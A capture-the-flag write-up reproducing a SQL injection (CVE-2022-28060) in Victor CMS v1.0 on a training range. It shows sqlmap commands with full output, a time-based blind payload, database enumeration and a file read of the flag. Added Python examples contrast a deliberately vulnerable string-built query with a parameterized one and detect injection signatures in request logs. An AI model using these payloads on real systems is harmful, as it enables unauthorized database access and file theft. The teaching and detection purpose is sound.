Preface
CVE-2022-28060 is a SQL injection vulnerability in Victor CMS v1.0. It lies in the user_name parameter handled by the file /includes/login.php. By sending crafted SQL statements, an attacker can exploit it to perform unauthorized database operations and thereby read or modify sensitive information in the database.
Vulnerability details
Vulnerability type: SQL injection
Affected component: Victor CMS v1.0
Attack vector: remote. An attacker can exploit the flaw by sending specially crafted requests to execute arbitrary SQL statements.
Severity: high (CVSS v3 base score 7.5)
Remediation
Use prepared statements: handle SQL requests with precompiled SQL statements or parameterized queries.
Input validation: strictly validate and filter all user input, accepting only input that matches the expected format.
Principle of least privilege: grant the database user the minimum privileges needed, so that even if an injection succeeds the attacker cannot obtain excessive rights.
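The first two items above, as an added example that is not Victor CMS code: a user lookup built by string concatenation, the pattern that lets a quote in user_name change the query, beside the parameterized form, with an allow-list check on the username and password verification done in code rather than in SQL. It runs against an in-memory SQLite database; the table and column names users, user_name, pw_salt and pw_hash are assumptions modelled on the form fields in this writeup.

```python
"""Vulnerable string-built lookup beside a parameterized one, plus input
validation and password verification. Added example, not Victor CMS code.
Schema (users / user_name / pw_salt / pw_hash) is an assumption for the demo."""
import hashlib
import hmac
import os
import re
import sqlite3

# Allow-list for usernames: letters, digits, underscore, dot, dash; 1..32 chars.
USER_NAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,32}$")


def hash_password(password, salt):
    """Slow salted hash; the password never reaches the SQL text at all."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)


def make_db():
    """Constructed in-memory database with a single account for the demo."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, user_name TEXT UNIQUE,"
        " pw_salt BLOB, pw_hash BLOB)"
    )
    salt = os.urandom(16)
    conn.execute(
        "INSERT INTO users (user_name, pw_salt, pw_hash) VALUES (?, ?, ?)",
        ("admin", salt, hash_password("correct-horse", salt)),
    )
    conn.commit()
    return conn


def probe_vulnerable(conn, user_name):
    """The flawed pattern: the value is spliced into the SQL text, so a quote in
    the input closes the literal and the remainder is parsed as SQL."""
    sql = "SELECT id FROM users WHERE user_name = '" + user_name + "'"
    return conn.execute(sql).fetchone() is not None


def probe_safe(conn, user_name):
    """Parameterized: the driver binds the value; it is data, never SQL."""
    sql = "SELECT id FROM users WHERE user_name = ?"
    return conn.execute(sql, (user_name,)).fetchone() is not None


def is_valid_user_name(user_name):
    """Second layer: reject anything outside the expected username format."""
    return USER_NAME_RE.fullmatch(user_name) is not None


def login(conn, user_name, password):
    """Hardened login: validate, look up by bound parameter, verify hash in code."""
    if not is_valid_user_name(user_name):
        return False
    row = conn.execute(
        "SELECT pw_salt, pw_hash FROM users WHERE user_name = ?", (user_name,)
    ).fetchone()
    if row is None:
        return False
    salt, stored = row
    return hmac.compare_digest(stored, hash_password(password, salt))


if __name__ == "__main__":
    db = make_db()
    for probe in ("admin' AND '1'='1", "admin' AND '1'='2"):
        print(repr(probe), "vulnerable:", probe_vulnerable(db, probe),
              "safe:", probe_safe(db, probe))
    print("login admin/correct-horse:", login(db, "admin", "correct-horse"))
    print("login admin/wrong:", login(db, "admin", "wrong"))
```

Against the vulnerable lookup, the inputs admin' AND '1'='1 and admin' AND '1'='2 produce different results, which is exactly the signal a boolean-based or time-based blind probe relies on; the parameterized lookup returns no row for either, because it searches for a user literally named that. On the third item, note that the --file-read step later in this writeup relies on MySQL's LOAD_FILE(), which requires the FILE privilege: the web application's database account should not hold it, and secure_file_priv should be set so the server refuses such reads.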
Chunqiu Yunjing (春秋云镜) is a cyber range focused on security training and hands-on exercises. By simulating realistic network environments and attack scenarios, it aims to improve users' defensive capabilities and practical skills. The platform mainly offers the following features:
Hands-on exercises
Offers a variety of attack-and-defense scenarios that simulate real network attacks, helping users master security techniques through practice. Scenarios cover web security, system security, network security, social engineering and other areas.
Vulnerability reproduction
Users can reproduce known vulnerabilities on the platform to understand their root causes, exploitation methods and fixes. Hands-on work helps users acquire both exploitation and defensive skills.
Teaching and training
Provides systematic security courses from beginner to advanced level across multiple security areas, suited to users of different levels. Combines theory with practical exercises so that learners improve both their knowledge and their hands-on ability.
Competitions and assessment
Regularly hosts security competitions such as CTF (Capture The Flag) events to motivate learners. Offers individual and team skill assessments so learners can gauge their own level.
Resource sharing
Offers a wealth of learning resources, including tutorials, tools and case studies, for users to consult at any time. Users can share experience and resources in the community and learn from one another.
Chunqiu Yunjing suits security professionals, students and anyone interested in cybersecurity; continuous study and practice on the platform is an effective way to build security skills and defensive capability.
Introduction
Victor CMS v1.0 is an open-source content management system (CMS) designed for managing and publishing website content. Its main features and functions are as follows:
Main features
Content management: a user-friendly interface for creating, editing and publishing site content, including articles, pages and media files.
User management: lets administrators create and manage user accounts and assign different permissions and roles, such as administrator and editor.
Themes and customization: supports multiple themes and templates so users can tailor the site's look and layout to their needs.
Multi-language support: content can be presented in several languages to serve a global audience.
SEO: integrates search engine optimization (SEO) features so that content is easier for search engines to index and retrieve.
Security: takes data security and user authentication into account, with basic access control and authentication mechanisms.
Use cases
Victor CMS v1.0 is suited to small businesses, personal blogs and community sites, offering a simple yet feature-rich content management platform. Its flexible functionality lets users build and manage many kinds of website to meet a range of needs.
Development and community support
As an open-source project, Victor CMS v1.0 offers an open development environment and community support. Users can turn to its GitHub page and related community forums for technical support, updates and customization advice.
Summary
Victor CMS v1.0 is an open-source CMS for a wide range of website projects; its simple interface and rich feature set make creating and managing site content convenient. If you are interested in building a personal or small-business website, Victor CMS v1.0 may be worth considering.
Vulnerability reproduction
Open the range instance. The page renders oddly; you have to scroll down to find the login form. Enter arbitrary values, then capture and intercept the request. It is a POST; copy the request into a txt file. A first probe shows that the user_name field is injectable.
┌──(root㉿kali)-[/home/suc2es2]
└─# sqlmap -r sqlmap.txt --batch
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.8.4#stable}
|_ -| . [)]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 15:56:03 /2024-06-30/

[15:56:03] [INFO] parsing HTTP request from 'sqlmap.txt'
[15:56:03] [WARNING] provided value for parameter 'login' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[15:56:03] [INFO] testing connection to the target URL
[15:56:03] [INFO] testing if the target URL content is stable
[15:56:04] [INFO] target URL content is stable
[15:56:04] [INFO] testing if POST parameter 'user_name' is dynamic
[15:56:04] [WARNING] POST parameter 'user_name' does not appear to be dynamic
[15:56:04] [WARNING] heuristic (basic) test shows that POST parameter 'user_name' might not be injectable
[15:56:04] [INFO] testing for SQL injection on POST parameter 'user_name'
[15:56:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:56:04] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[15:56:04] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[15:56:05] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[15:56:05] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[15:56:06] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[15:56:06] [INFO] testing 'Generic inline queries'
[15:56:06] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[15:56:07] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[15:56:07] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[15:56:07] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[15:56:28] [INFO] POST parameter 'user_name' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[15:56:28] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[15:56:28] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
got a 302 redirect to 'http://eci-2ze7i6mdn52cbhya3l8h.cloudeci1.ichunqiu.com/index.php'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] N
[15:56:30] [INFO] target URL appears to be UNION injectable with 9 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
[15:56:40] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
[15:56:40] [INFO] checking if the injection point on POST parameter 'user_name' is a false positive
POST parameter 'user_name' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 144 HTTP(s) requests:
---
Parameter: user_name (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: user_name=admin' AND (SELECT 6619 FROM (SELECT(SLEEP(5)))JhxZ) AND 'ofTE'='ofTE&user_password=admin&login=
---
[15:57:10] [INFO] the back-end DBMS is MySQL
[15:57:10] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
back-end DBMS: MySQL >= 5.0.12
[15:57:11] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2ze7i6mdn52cbhya3l8h.cloudeci1.ichunqiu.com'

[*] ending @ 15:57:11 /2024-06-30/

Brute-forcing the databases
┌──(root㉿kali)-[/home/suc2es2]
└─# sqlmap -r sqlmap.txt --batch --dbs
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.8.4#stable}
|_ -| . [.]     | .'| . |
|___|_  []_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 15:57:32 /2024-06-30/

[15:57:32] [INFO] parsing HTTP request from 'sqlmap.txt'
[15:57:32] [WARNING] provided value for parameter 'login' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[15:57:32] [INFO] resuming back-end DBMS 'mysql'
[15:57:32] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: user_name (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: user_name=admin' AND (SELECT 6619 FROM (SELECT(SLEEP(5)))JhxZ) AND 'ofTE'='ofTE&user_password=admin&login=
---
[15:57:32] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[15:57:32] [INFO] fetching database names
[15:57:32] [INFO] fetching number of databases
[15:57:32] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[15:57:45] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
5
[15:57:56] [INFO] retrieved:
[15:58:06] [INFO] adjusting time delay to 1 second due to good response times
information_schema
[16:00:09] [INFO] retrieved: mysql
[16:00:44] [INFO] retrieved: performance_schema
[16:02:46] [INFO] retrieved: php_cms
[16:03:51] [INFO] retrieved: sys
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] php_cms
[*] sys

Looking for the flag file via the mysql database
┌──(root㉿kali)-[/home/suc2es2]
└─# sqlmap -r sqlmap.txt --batch -D mysql --file-read /flag
        ___
       __H__
 ___ ___[]_____ ___ ___  {1.8.4#stable}
|_ -| . []     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 16:21:11 /2024-06-30/

[16:21:11] [INFO] parsing HTTP request from 'sqlmap.txt'
[16:21:11] [WARNING] provided value for parameter 'login' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[16:21:11] [INFO] resuming back-end DBMS 'mysql'
[16:21:11] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: user_name (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: user_name=admin' AND (SELECT 6619 FROM (SELECT(SLEEP(5)))JhxZ) AND 'ofTE'='ofTE&user_password=admin&login=
---
[16:21:11] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[16:21:11] [INFO] fingerprinting the back-end DBMS operating system
[16:21:14] [INFO] the back-end DBMS operating system is Linux
[16:21:14] [INFO] fetching file: '/flag'
[16:21:14] [INFO] retrieved:
[16:21:14] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
6
[16:21:44] [INFO] adjusting time delay to 1 second due to good response times
66C61677B39623135393033642D313165642D343032632D613232622D6434666537303065656330367D
do you want confirmation that the remote file '/flag' has been successfully downloaded from the back-end DBMS file system? [Y/n] Y
[16:27:51] [INFO] retrieved: 42
[16:27:59] [INFO] the local file '/root/.local/share/sqlmap/output/eci-2ze7i6mdn52cbhya3l8h.cloudeci1.ichunqiu.com/files/_flag' and the remote file '/flag' have the same size (42 B)
files saved to [1]:
[*] /root/.local/share/sqlmap/output/eci-2ze7i6mdn52cbhya3l8h.cloudeci1.ichunqiu.com/files/_flag (same file)

[16:27:59] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2ze7i6mdn52cbhya3l8h.cloudeci1.ichunqiu.com'

[*] ending @ 16:27:59 /2024-06-30/

Accessing the flag
┌──(root㉿kali)-[/home/suc2es2]
└─# cat /root/.local/share/sqlmap/output/eci-2ze7i6mdn52cbhya3l8h.cloudeci1.ichunqiu.com/files/_flag
flag{9b15903d-11ed-402c-a22b-d4fe700eec06}
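From the defender's side, the sqlmap runs above leave a recognizable trail: a quote breaking out of the user_name literal followed by AND, SLEEP() probes whose response times track the requested delay, UNION SELECT column probing, and LOAD_FILE() for the file read. The following added example (not part of the writeup or of Victor CMS) triages application-level login request records for those patterns and, for SLEEP payloads, checks whether the observed latency confirms that the database actually executed the injected statement. The request records, their latencies and the log format are constructed for the demo.

```python
"""Triage of login POST bodies for the SQL injection patterns visible in the
sqlmap output above. Added example; the request log below is constructed."""
import re
from urllib.parse import parse_qs

# Constructed records: (request id, raw form body as received, response latency in seconds)
SAMPLE_REQUESTS = [
    (1, "user_name=alice&user_password=s3cret&login=", 0.12),
    # The payload sqlmap reported in the writeup; latency shows the delay really happened.
    (2, "user_name=admin' AND (SELECT 6619 FROM (SELECT(SLEEP(5)))JhxZ) AND 'ofTE'='ofTE"
        "&user_password=admin&login=", 5.21),
    # Same class of probe but no delay observed (e.g. blocked or not executed).
    (3, "user_name=admin' AND SLEEP(5) AND 'a'='a&user_password=admin&login=", 0.10),
    # UNION column probing, as in the '1 to 20 columns' phase of the run.
    (4, "user_name=admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"
        "&user_password=x&login=", 0.15),
]

# Signatures derived from the techniques seen in the log; names are this example's own.
SIGNATURES = {
    "time-based (SLEEP/BENCHMARK)": re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.I),
    "union-based": re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),
    "file read (LOAD_FILE)": re.compile(r"\bLOAD_FILE\s*\(", re.I),
    "quote breakout + AND/OR": re.compile(r"'\s*(AND|OR)\s+", re.I),
}
SLEEP_RE = re.compile(r"\bSLEEP\s*\(\s*(\d+(?:\.\d+)?)\s*\)", re.I)


def inspect_request(req_id, body, latency, tolerance=0.9):
    """Return a finding dict for a suspicious request, or None for a clean one.

    sleep_confirmed is True when the body asked for SLEEP(n) and the response
    took at least tolerance * n seconds: the injected SQL was executed."""
    fields = parse_qs(body, keep_blank_values=True)  # percent-decodes every field
    text = " ".join(v for values in fields.values() for v in values)
    hits = [name for name, rx in SIGNATURES.items() if rx.search(text)]
    if not hits:
        return None
    requested = max((float(n) for n in SLEEP_RE.findall(text)), default=None)
    confirmed = requested is not None and latency >= tolerance * requested
    return {
        "id": req_id,
        "signatures": hits,
        "requested_delay": requested,
        "sleep_confirmed": confirmed,
    }


def analyze(requests):
    """Run inspect_request over a batch and keep only the flagged ones."""
    return [f for f in (inspect_request(*r) for r in requests) if f]


if __name__ == "__main__":
    for finding in analyze(SAMPLE_REQUESTS):
        print(finding)
```

The signature matches alone say that someone is probing; the latency correlation is what separates a probe the application neutralized from one the database executed, which is the distinction sqlmap itself drew when it declared user_name injectable after the 21-second gap in the first run. Plain web-server access logs do not contain POST bodies, so this kind of check needs application-level or WAF logging of form fields.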